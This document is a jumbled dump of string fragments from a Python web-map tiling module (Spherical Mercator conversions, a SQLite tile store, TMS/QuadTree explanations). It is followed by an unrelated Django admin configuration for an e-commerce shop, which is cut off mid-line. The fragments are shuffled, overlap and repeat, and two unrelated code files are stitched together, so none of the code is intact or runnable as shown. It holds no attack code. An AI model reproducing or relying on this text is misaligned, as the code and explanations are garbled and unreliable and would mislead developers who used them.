coordinates with PROJ.4? You can", "\"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\"", "the extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33", "TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for", "tiles ( x int, y int, z int, s int, image blob, PRIMARY", "on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles", "def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile in EPSG:900913", "* math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift", "point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx", "AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import sqlite3 import os", "KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT,", "Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326)", "the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return", "for given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile(", "projection is used only for map display, and not for displaying numeric coordinates,", "IF NOT EXISTS tiles ( x int, y int, z int, s int,", "filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename)", "TileMapService What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244,", "1 grayscale, one alpha mask import sqlite3 import os import math __version__ =", "clients like Google Maps are projecting those coordinates by Spherical Mercator, so in", "int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s)", "\\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z)", "into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None", "spherical form of projection, not the ellipsoidal form. Since the projection is used", "self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and z=?\", (x, y,", "in your product, translate it to another language or find it usefull for", "<< zoom py = mapSize - pyr res = self.Resolution( zoom ) mx", "global tiles used on the web. It contains classes implementing coordinate conversions for:", "(origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global", "WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift", "on the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based", "the top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree", "py = (my + self.originShift) / res mapSize = self.tileSize << zoom return", "- y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new", "In fact you can calculate the constant as: 2 * math.pi * 6378137", "math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift =", "The same projection is degined as EPSG:3785. WKT definition is in the official", "[] def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename):", "new storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite:", "you can overlay them on top of base maps of those web mapping", "of extent. In fact you can calculate the constant as: 2 * math.pi", "cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT,", "px, mapSize - py def PixelsToTile(self, px, py): \"Returns a tile covering region", "(equal extent, projection, pixel size), there is just different identification of the same", "return True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info", "z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE", "image = str(res[0]) return image else : print (\"None found\") return None def", "different identification of the same raster tile. Tiles in TMS are counted from", "tiles used on the web. It contains classes implementing coordinate conversions for: -", "= self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon)", ") maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny,", "coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps,", "Class is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32", "projection, pixel size), there is just different identification of the same raster tile.", "with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.", "covering region in given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize)", "/ 360.0 )) / (math.pi / 180.0) my = my * self.originShift /", "storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written = set()", "pixels tile, every lower zoom level resolution is always divided by two initialResolution", "- ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to", "/ self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi", "self.originShift my = py * res - self.originShift return mx, my def MetersToPixels(self,", "Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]],", "IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int)", "return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom =", "overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme from a TMS", "latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon =", "2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels", "# coordinate origin is moved from bottom-left to top-left corner of the extent", "at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition is in", "if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z,", "extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from", "z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles", "exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db", "dot cz. I would like to know where it was used. Class is", "2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case you", "self.originShift) / res py = (my + self.originShift) / res mapSize = self.tileSize", "tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance", "if (ty & mask) != 0: digit += 2 quadKey += str(digit) return", "Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them on", "is XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the", "res = self.Resolution( zoom ) px = (mx + self.originShift) / res py", "is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The", "minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon,", "single tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x,", "a tile covering region in given pixel coordinates\" tx = int( math.ceil( px", "256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile", "= z if self.maxzoom is None or z > self.maxzoom: self.maxzoom = z", "18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\"", "False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?),", "= self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images", "math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326", "pyramid lat/lon XY in metres XY pixels Z zoom XYZ from TMS EPSG:4326", "The tile raster itself is the same (equal extent, projection, pixel size), there", "self.maxzoom is None or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self,", "(self.type, )) self.minzoom = None self.maxzoom = None self.written = set() self.db.commit() self.pending_images", "WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting those", "_ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx,", "simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create", "def writeImage(self, x, y, z, image) : \"\"\" write a single tile from", "Sqlite files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self,", "p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1,", "top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level", "(ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx,", "the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection", "EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if", "tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates", "for displaying numeric coordinates, we don't need the extra precision of an ellipsoidal", "compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace", "coordinates on sphere are treated as if the were on the WGS84 ellipsoid.", "ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\"", "__version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite", "pixel coordinates to top-left corner\" # # mapSize = self.tileSize << zoom #", "p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level", "klokan dot cz. I would like to know where it was used. Class", "in metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. ---------", "EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0],", "overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys", "for generation of global tiles used on the web. It contains classes implementing", "px, py, zoom): # \"Move the origin of pixel coordinates to top-left corner\"", "translate it to another language or find it usefull for your project please", "$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come", "my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\" res", "self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500 or force: cur", "self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db =", "Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers", "coordinates to top-left corner\" # # mapSize = self.tileSize << zoom # return", "coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters", "Web Clients TileMapService What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244,", "of the same raster tile. Tiles in TMS are counted from [0,0] in", "a new sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname,", "x int, y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\")", "in pyramid Tiles in pyramid lat/lon XY in metres XY pixels Z zoom", "(TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on the", "Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on", "bottom-left). What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon", "z)) res = cur.fetchone() if res: image = str(res[0]) return image else :", "* 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs", "new sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite)", "other GIS programs check the exact definition of the projection: More info at", "close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom =", "res: xx= x zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z)", "256x256 pixels tile, every lower zoom level resolution is always divided by two", "self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom )", "given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) - 1", "\"\" ty = (2**zoom - 1) - ty for i in range(zoom, 0,", "the calculations, we use the spherical form of projection, not the ellipsoidal form.", "len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x,", "to lat/lon in WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat", "the circumference of the Earth in meters, which is 40 thousand kilometers, the", "self.minzoom: self.minzoom = z if self.maxzoom is None or z > self.maxzoom: self.maxzoom", "scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "level (measured at Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize", "os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x,", "GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator", "All of the tools supports -t_srs 'epsg:900913'. For other GIS programs check the", "don't want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile", "divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What", "tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])", "= (2**zoom - 1) - ty for i in range(zoom, 0, -1): digit", "85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid with", "\"\"\" if (x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x,", "\"Returns bounds of the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters(", "use WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting", "and not for displaying numeric coordinates, we don't need the extra precision of", "Microsoft is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx", "(?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z) : \"\"\"", "use the spherical form of projection, not the ellipsoidal form. Since the projection", "MODIFIED FROM ORIGINAL, come with no warranty # <NAME> # input: vrt file", "in WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat = (my", "yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles", "desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\"", "\"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite", "sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur", "WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical", ": \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return", "new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in", "tile raster itself is the same (equal extent, projection, pixel size), there is", "Pixels in pyramid Tiles in pyramid lat/lon XY in metres XY pixels Z", "# <NAME> # input: vrt file (-addalpha) in 3857 projection (projection is forced", "a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image)", "coordinates in given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize <<", "covered by 256x256 pixels tile, every lower zoom level resolution is always divided", "/ (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal", "\"\"\" write a single tile from a file \"\"\" self.writeImage(x, y, z, f.read())", "self.db = sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur =", "write a single tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def", "Profiles ============================================================== Functions necessary for generation of global tiles used on the web.", "for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps,", "return image else : print (\"None found\") return None def createFromDirectory(self, filename, basedir,", "* math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def", "info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition is", "17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname,", "self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid", "EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> | | <-> /----/", "of the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx,", "placed the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is", "target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res =", "the same raster tile. Tiles in TMS are counted from [0,0] in the", "def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme", "in pyramid lat/lon XY in metres XY pixels Z zoom XYZ from TMS", "\"\"\" Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\"", "sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles (", "self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image) : \"\"\" write", "and Google Maps/QuadTree tile name convention? The tile raster itself is the same", "math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0) my", "from tiles\") res = cur.fetchall() for (x, y, z) in res: xx= x", "2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of", "http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles", "# input: vrt file (-addalpha) in 3857 projection (projection is forced due #", "<< zoom return px, mapSize - py def PixelsToTile(self, px, py): \"Returns a", "target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res", "a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "zoom): # \"Move the origin of pixel coordinates to top-left corner\" # #", "GDAL2Tiles for OSGEO. In case you use this class in your product, translate", "raster tile. Tiles in TMS are counted from [0,0] in the bottom-left corner,", "off. What are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region", "/ float(self.tileSize) ) - 1 ) ty = int( math.ceil( py / float(self.tileSize)", "> self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False): if len(self.pending_images)", "set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open an existing", "pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS /", "projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible", "TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom", "display, and not for displaying numeric coordinates, we don't need the extra precision", "256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244", "ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon,", "+y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps", "self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or", "self.minzoom = None self.maxzoom = None self.written = set() self.db.commit() self.pending_images = []", "p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for", "WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563,", "p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _", "globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles ==============================================================", ") ty = int( math.ceil( py / float(self.tileSize) ) - 1 ) return", "miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize,", "readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS", "do I create a raster in EPSG:900913 and convert coordinates with PROJ.4? You", "2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon", "px / float(self.tileSize) ) - 1 ) ty = int( math.ceil( py /", "(i-1) if (tx & mask) != 0: digit += 1 if (ty &", "cur.fetchall() for (x, y, z) in res: xx= x zz= z yy= 2**zz", "is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower", "-t_srs 'epsg:900913'. For other GIS programs check the exact definition of the projection:", "of pixel coordinates to top-left corner\" # # mapSize = self.tileSize << zoom", "/ 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr,", "TMS and Google Maps/QuadTree tile name convention? The tile raster itself is the", "minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds", "in given zoom level\" res = self.Resolution( zoom ) px = (mx +", "x, y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self,", "from string \"\"\" if (x, y, z) in self.written: return self.written.add((x, y, z))", "of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]],", "y, z) : \"\"\" read a single tile as string \"\"\" cur =", "tile from string \"\"\" if (x, y, z) in self.written: return self.written.add((x, y,", "coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters(", "self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\",", "| <-> /----/ <-> Google \\ / | | /--------/ QuadTree ----- ---------", "def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913 to", "Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual Earth,", "noticable. How do I create a raster in EPSG:900913 and convert coordinates with", "quadKey = \"\" ty = (2**zoom - 1) - ty for i in", "BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor()", "for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84" ]
[ "= ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3", "from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile,", "readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount',", "= ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon']", "readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy =", "@admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund", "'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact)", "class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity',", "'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}),", "'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display =", "'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\"", "Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size #", "django.contrib import admin from django.utils.html import format_html # from django.contrib.auth.models import Group from", "'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted]", "5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type',", "@admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted',", "# admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name',", "('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2',", "search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields", "ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price',", "list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions =", "to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields", "['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct)", "import Group from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting,", "Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin):", "] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user',", "class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to", "model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug',", "] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class", "'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter", "''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to", "'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy =", "['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5", "'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title =", "list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page =", "['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title", "@admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2',", "ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages", "@admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order',", "'town', 'country', 'zip', 'address_type', 'default'] list_filter = 